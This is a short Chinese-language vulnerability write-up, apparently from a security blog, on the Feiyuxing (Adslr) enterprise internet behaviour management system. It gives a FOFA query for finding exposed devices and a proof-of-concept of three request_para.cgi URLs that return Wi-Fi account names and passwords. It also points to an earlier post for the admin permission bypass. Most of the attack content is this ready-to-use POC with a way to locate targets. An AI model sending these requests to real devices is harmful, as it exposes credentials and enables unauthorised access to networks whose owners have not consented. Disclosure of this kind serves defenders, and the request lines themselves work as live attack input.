# 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞
## 漏洞描述
飞鱼星 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞,可以获取管理员权限以及用户密码
## 漏洞影响
> [!NOTE]
>
> 飞鱼星 企业级智能上网行为管理系统
## FOFA
> [!NOTE]
>
> title=”飞鱼星企业级智能上网行为管理系统”
## 漏洞复现
权限绕过参考上一篇 **飞鱼星 家用智能路由 cookie.cgi 权限绕过**
信息泄露POC
“`
/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
“`
## Goby & POC
> [!NOTE]
>
> Adslr Enterprise online behavior management system Information leakage
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容